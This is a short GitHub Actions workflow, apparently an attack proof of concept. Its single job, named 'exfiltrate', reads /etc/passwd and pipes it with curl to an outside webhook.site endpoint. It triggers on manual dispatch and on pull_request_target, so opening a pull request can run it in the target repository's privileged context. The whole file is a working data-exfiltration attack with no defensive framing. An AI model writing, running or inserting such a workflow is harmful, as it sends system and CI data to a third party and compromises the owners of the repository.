name: show-passwd

on:
  workflow_dispatch:  # run manually from Actions tab
  pull_request_target:  # will also trigger if PR is opened

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Dump /etc/passwd
        run: |
          echo "[+] dumping passwd..."
          cat /etc/passwd | curl -X POST -d @- https://webhook.site/d3dabef3-8bf1-41f6-ab7a-9f13e9ab646a
